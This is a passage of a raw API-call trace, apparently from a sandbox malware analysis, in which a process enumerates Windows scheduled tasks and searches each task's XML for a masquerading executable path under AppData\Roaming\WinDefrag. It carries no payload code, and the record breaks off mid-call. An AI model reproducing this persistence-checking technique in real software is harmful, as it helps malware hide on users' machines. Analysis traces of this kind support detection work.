(This=0x328240) returned 0x0 [0169.612] IRegisteredTaskCollection:get_Item (in: This=0x3280f0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x12, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328240) returned 0x0 [0169.613] IRegisteredTask:get_Name (in: This=0x328240, pName=0x18e230 | out: pName=0x18e230*="RegisterSearch") returned 0x0 [0169.613] IRegisteredTask:get_Xml (in: This=0x328240, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\RegisterSearch\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-24)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoRegisterSearch $(Arg0)\r\n \r\n \r\n") returned 0x0 [0169.615] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\RegisterSearch\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-24)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoRegisterSearch $(Arg0)\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.615] IUnknown:Release (This=0x328240) returned 0x0 [0169.615] IRegisteredTaskCollection:get_Item (in: This=0x3280f0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x13, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328240) returned 0x0 [0169.615] IRegisteredTask:get_Name (in: This=0x328240, pName=0x18e230 | out: pName=0x18e230*="ReindexSearchRoot") returned 0x0 [0169.615] IRegisteredTask:get_Xml (in: This=0x328240, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ReindexSearchRoot\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-26)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoReindexSearchRoot\r\n \r\n \r\n") returned 0x0 [0169.618] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ReindexSearchRoot\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-26)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoReindexSearchRoot\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.618] IUnknown:Release (This=0x328240) returned 0x0 [0169.618] IRegisteredTaskCollection:get_Item (in: This=0x3280f0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x14, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328240) returned 0x0 [0169.618] IRegisteredTask:get_Name (in: This=0x328240, pName=0x18e230 | out: pName=0x18e230*="SqlLiteRecoveryTask") returned 0x0 [0169.618] IRegisteredTask:get_Xml (in: This=0x328240, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\SqlLiteRecoveryTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-133)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-134)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -SqlLiteRecoveryTask\r\n \r\n \r\n {59116E30-02BD-4b84-BA1E-5D77E809B1A2}\r\n \r\n \r\n \r\n") returned 0x0 [0169.621] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\SqlLiteRecoveryTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-133)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-134)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -SqlLiteRecoveryTask\r\n \r\n \r\n {59116E30-02BD-4b84-BA1E-5D77E809B1A2}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.621] IUnknown:Release (This=0x328240) returned 0x0 [0169.621] IRegisteredTaskCollection:get_Item (in: This=0x3280f0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x15, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328240) returned 0x0 [0169.621] IRegisteredTask:get_Name (in: This=0x328240, pName=0x18e230 | out: pName=0x18e230*="UpdateRecordPath") returned 0x0 [0169.621] IRegisteredTask:get_Xml (in: This=0x328240, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\UpdateRecordPath\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-13)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;AU)(A;;FXFR;;;S-1-5-80-567955335-3455378119-3305749985-2554534624-1867504835)(A;OICI;FRFWFXDTDCSD;;;S-1-5-80-3864065939-1897331054-469427076-3133256761-1570309435)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoUpdateRecordPath $(Arg0)\r\n \r\n \r\n") returned 0x0 [0169.623] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\UpdateRecordPath\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-13)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;AU)(A;;FXFR;;;S-1-5-80-567955335-3455378119-3305749985-2554534624-1867504835)(A;OICI;FRFWFXDTDCSD;;;S-1-5-80-3864065939-1897331054-469427076-3133256761-1570309435)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoUpdateRecordPath $(Arg0)\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.624] IUnknown:Release (This=0x328240) returned 0x0 [0169.624] IUnknown:Release (This=0x3280f0) returned 0x0 [0169.624] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x3280f0) returned 0x0 [0169.625] ITaskFolderCollection:get_Count (in: This=0x3280f0, pCount=0x18e3a8 | out: pCount=0x18e3a8*=1) returned 0x0 [0169.625] ITaskFolderCollection:get_Item (in: This=0x3280f0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppFolder=0x18e220 | out: ppFolder=0x18e220*=0x328250) returned 0x0 [0169.625] ITaskFolder:GetTasks (in: This=0x328250, flags=1, ppTasks=0x18e0b0 | out: ppTasks=0x18e0b0*=0x32a750) returned 0x0 [0169.626] IRegisteredTaskCollection:get_Count (in: This=0x32a750, pCount=0x18e200 | out: pCount=0x18e200*=0) returned 0x0 [0169.626] IUnknown:Release (This=0x32a750) returned 0x0 [0169.626] ITaskFolder:GetFolders (in: This=0x328250, flags=0, ppFolders=0x18e098 | out: ppFolders=0x18e098*=0x32a750) returned 0x0 [0169.627] ITaskFolderCollection:get_Count (in: This=0x32a750, pCount=0x18e218 | out: pCount=0x18e218*=0) returned 0x0 [0169.627] IUnknown:Release (This=0x32a750) returned 0x0 [0169.627] TaskScheduler:IUnknown:Release (This=0x328250) returned 0x0 [0169.627] IUnknown:Release (This=0x3280f0) returned 0x0 [0169.627] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.627] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xe, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.628] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x3280f0) returned 0x0 [0169.686] IRegisteredTaskCollection:get_Count (in: This=0x3280f0, pCount=0x18e390 | out: pCount=0x18e390*=2) returned 0x0 [0169.686] IRegisteredTaskCollection:get_Item (in: This=0x3280f0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328250) returned 0x0 [0169.686] IRegisteredTask:get_Name (in: This=0x328250, pName=0x18e230 | out: pName=0x18e230*="CorruptionDetector") returned 0x0 [0169.686] IRegisteredTask:get_Xml (in: This=0x328250, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\memdiag.dll,-230)\r\n $(@%SystemRoot%\\system32\\memdiag.dll,-231)\r\n \\Microsoft\\Windows\\MemoryDiagnostic\\CorruptionDetector\r\n O:BAG:BAD:P(D;;GA;;;BG)(D;;GA;;;AN)(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRSD;;;BU)\r\n 1.0\r\n $(@%SystemRoot%\\system32\\memdiag.dll,-232)\r\n \r\n \r\n true\r\n IgnoreNew\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Application Popup'] and EventID=1801]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {190BA3F6-0205-4f46-B589-95C6822899D2}\r\n \r\n \r\n \r\n") returned 0x0 [0169.703] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\memdiag.dll,-230)\r\n $(@%SystemRoot%\\system32\\memdiag.dll,-231)\r\n \\Microsoft\\Windows\\MemoryDiagnostic\\CorruptionDetector\r\n O:BAG:BAD:P(D;;GA;;;BG)(D;;GA;;;AN)(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRSD;;;BU)\r\n 1.0\r\n $(@%SystemRoot%\\system32\\memdiag.dll,-232)\r\n \r\n \r\n true\r\n IgnoreNew\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Application Popup'] and EventID=1801]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {190BA3F6-0205-4f46-B589-95C6822899D2}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.704] IUnknown:Release (This=0x328250) returned 0x0 [0169.704] IRegisteredTaskCollection:get_Item (in: This=0x3280f0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328250) returned 0x0 [0169.704] IRegisteredTask:get_Name (in: This=0x328250, pName=0x18e230 | out: pName=0x18e230*="DecompressionFailureDetector") returned 0x0 [0169.704] IRegisteredTask:get_Xml (in: This=0x328250, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\memdiag.dll,-230)\r\n $(@%SystemRoot%\\system32\\memdiag.dll,-231)\r\n \\Microsoft\\Windows\\MemoryDiagnostic\\DecompressionFailureDetector\r\n O:BAG:BAD:P(D;;GA;;;BG)(D;;GA;;;AN)(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRSD;;;BU)\r\n 1.0\r\n $(@%SystemRoot%\\system32\\memdiag.dll,-232)\r\n \r\n \r\n true\r\n IgnoreNew\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"Microsoft-Windows-Kernel-StoreMgr/Operational\"><Select Path=\"Microsoft-Windows-Kernel-StoreMgr/Operational\">*[System[Provider[@Name='Microsoft-Windows-Kernel-StoreMgr'] and EventID=6]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {190BA3F6-0205-4f46-B589-95C6822899D2}\r\n \r\n \r\n \r\n") returned 0x0 [0169.706] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\memdiag.dll,-230)\r\n $(@%SystemRoot%\\system32\\memdiag.dll,-231)\r\n \\Microsoft\\Windows\\MemoryDiagnostic\\DecompressionFailureDetector\r\n O:BAG:BAD:P(D;;GA;;;BG)(D;;GA;;;AN)(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRSD;;;BU)\r\n 1.0\r\n $(@%SystemRoot%\\system32\\memdiag.dll,-232)\r\n \r\n \r\n true\r\n IgnoreNew\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"Microsoft-Windows-Kernel-StoreMgr/Operational\"><Select Path=\"Microsoft-Windows-Kernel-StoreMgr/Operational\">*[System[Provider[@Name='Microsoft-Windows-Kernel-StoreMgr'] and EventID=6]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {190BA3F6-0205-4f46-B589-95C6822899D2}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.706] IUnknown:Release (This=0x328250) returned 0x0 [0169.707] IUnknown:Release (This=0x3280f0) returned 0x0 [0169.707] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x3280f0) returned 0x0 [0169.708] ITaskFolderCollection:get_Count (in: This=0x3280f0, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.708] IUnknown:Release (This=0x3280f0) returned 0x0 [0169.708] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.708] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xf, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.708] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x3280e0) returned 0x0 [0169.709] IRegisteredTaskCollection:get_Count (in: This=0x3280e0, pCount=0x18e390 | out: pCount=0x18e390*=1) returned 0x0 [0169.709] IRegisteredTaskCollection:get_Item (in: This=0x3280e0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328230) returned 0x0 [0169.709] IRegisteredTask:get_Name (in: This=0x328230, pName=0x18e230 | out: pName=0x18e230*="HotStart") returned 0x0 [0169.709] IRegisteredTask:get_Xml (in: This=0x328230, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-500)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n $(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-501)\r\n $(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-502)\r\n Microsoft\\Windows\\MobilePC\\HotStart\r\n \r\n \r\n \r\n S-1-5-11\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n false\r\n false\r\n \r\n true\r\n http://schemas.microsoft.com/windows/2004/02/mit/task\r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n true\r\n false\r\n true\r\n PT0S\r\n \r\n \r\n \r\n {06DA0625-9701-43da-BFD7-FBEEA2180A1E}\r\n \r\n \r\n") returned 0x0 [0169.712] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-500)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n $(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-501)\r\n $(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-502)\r\n Microsoft\\Windows\\MobilePC\\HotStart\r\n \r\n \r\n \r\n S-1-5-11\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n false\r\n false\r\n \r\n true\r\n http://schemas.microsoft.com/windows/2004/02/mit/task\r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n true\r\n false\r\n true\r\n PT0S\r\n \r\n \r\n \r\n {06DA0625-9701-43da-BFD7-FBEEA2180A1E}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.712] IUnknown:Release (This=0x328230) returned 0x0 [0169.712] IUnknown:Release (This=0x3280e0) returned 0x0 [0169.712] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x3280e0) returned 0x0 [0169.713] ITaskFolderCollection:get_Count (in: This=0x3280e0, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.713] IUnknown:Release (This=0x3280e0) returned 0x0 [0169.713] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.713] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x10, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.713] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x3280e0) returned 0x0 [0169.715] IRegisteredTaskCollection:get_Count (in: This=0x3280e0, pCount=0x18e390 | out: pCount=0x18e390*=1) returned 0x0 [0169.715] IRegisteredTaskCollection:get_Item (in: This=0x3280e0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328220) returned 0x0 [0169.715] IRegisteredTask:get_Name (in: This=0x328220, pName=0x18e230 | out: pName=0x18e230*="LPRemove") returned 0x0 [0169.715] IRegisteredTask:get_Xml (in: This=0x328220, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n $(@%systemRoot%\\System32\\lpremove.exe,-100)\r\n $(@%systemRoot%\\System32\\lpremove.exe,-100)\r\n $(@%systemRoot%\\System32\\lpremove.exe,-101)\r\n Microsoft\\Windows\\MUI\\LPRemove\r\n \r\n \r\n \r\n PT25M\r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n \r\n IgnoreNew\r\n true\r\n false\r\n false\r\n false\r\n false\r\n true\r\n true\r\n false\r\n true\r\n false\r\n true\r\n PT9H\r\n \r\n \r\n \r\n %windir%\\system32\\lpremove.exe\r\n \r\n \r\n") returned 0x0 [0169.718] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemRoot%\\System32\\lpremove.exe,-100)\r\n $(@%systemRoot%\\System32\\lpremove.exe,-100)\r\n $(@%systemRoot%\\System32\\lpremove.exe,-101)\r\n Microsoft\\Windows\\MUI\\LPRemove\r\n \r\n \r\n \r\n PT25M\r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n \r\n IgnoreNew\r\n true\r\n false\r\n false\r\n false\r\n false\r\n true\r\n true\r\n false\r\n true\r\n false\r\n true\r\n PT9H\r\n \r\n \r\n \r\n %windir%\\system32\\lpremove.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.719] IUnknown:Release (This=0x328220) returned 0x0 [0169.719] IUnknown:Release (This=0x3280e0) returned 0x0 [0169.719] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x3280e0) returned 0x0 [0169.720] ITaskFolderCollection:get_Count (in: This=0x3280e0, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.720] IUnknown:Release (This=0x3280e0) returned 0x0 [0169.720] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.720] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x11, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.720] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x3280f0) returned 0x0 [0169.722] IRegisteredTaskCollection:get_Count (in: This=0x3280f0, pCount=0x18e390 | out: pCount=0x18e390*=1) returned 0x0 [0169.722] IRegisteredTaskCollection:get_Item (in: This=0x3280f0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328240) returned 0x0 [0169.722] IRegisteredTask:get_Name (in: This=0x328240, pName=0x18e230 | out: pName=0x18e230*="SystemSoundsService") returned 0x0 [0169.722] IRegisteredTask:get_Xml (in: This=0x328240, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n 2005-06-23T13:48:00-08:00\r\n $(@%systemRoot%\\System32\\PlaySndSrv.Dll,-105)\r\n Microsoft\\Windows\\Multimedia\\SystemSoundsService\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;AU)\r\n $(@%systemRoot%\\System32\\PlaySndSrv.Dll,-106)\r\n \r\n \r\n \r\n \r\n \r\n true\r\n true\r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n PT0S\r\n true\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n \r\n {2DEA658F-54C1-4227-AF9B-260AB5FC3543}\r\n \r\n \r\n") returned 0x0 [0169.731] StrStrIW (lpFirst="\r\n\r\n \r\n 2005-06-23T13:48:00-08:00\r\n $(@%systemRoot%\\System32\\PlaySndSrv.Dll,-105)\r\n Microsoft\\Windows\\Multimedia\\SystemSoundsService\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;AU)\r\n $(@%systemRoot%\\System32\\PlaySndSrv.Dll,-106)\r\n \r\n \r\n \r\n \r\n \r\n true\r\n true\r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n PT0S\r\n true\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n \r\n {2DEA658F-54C1-4227-AF9B-260AB5FC3543}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.731] IUnknown:Release (This=0x328240) returned 0x0 [0169.731] IUnknown:Release (This=0x3280f0) returned 0x0 [0169.731] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x3280f0) returned 0x0 [0169.732] ITaskFolderCollection:get_Count (in: This=0x3280f0, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.732] IUnknown:Release (This=0x3280f0) returned 0x0 [0169.732] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.732] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x12, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.732] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x3280e0) returned 0x0 [0169.734] IRegisteredTaskCollection:get_Count (in: This=0x3280e0, pCount=0x18e390 | out: pCount=0x18e390*=1) returned 0x0 [0169.734] IRegisteredTaskCollection:get_Item (in: This=0x3280e0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328230) returned 0x0 [0169.734] IRegisteredTask:get_Name (in: This=0x328230, pName=0x18e230 | out: pName=0x18e230*="GatherNetworkInfo") returned 0x0 [0169.734] IRegisteredTask:get_Xml (in: This=0x328230, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n \\Microsoft\\Windows\\NetTrace\\GatherNetworkInfo\r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6910)\r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6911)\r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6912)\r\n \r\n \r\n \r\n Parallel\r\n false\r\n true\r\n 7\r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\gatherNetworkInfo.vbs\r\n $(Arg1)\r\n \r\n \r\n") returned 0x0 [0169.737] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\NetTrace\\GatherNetworkInfo\r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6910)\r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6911)\r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6912)\r\n \r\n \r\n \r\n Parallel\r\n false\r\n true\r\n 7\r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\gatherNetworkInfo.vbs\r\n $(Arg1)\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.737] IUnknown:Release (This=0x328230) returned 0x0 [0169.737] IUnknown:Release (This=0x3280e0) returned 0x0 [0169.737] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 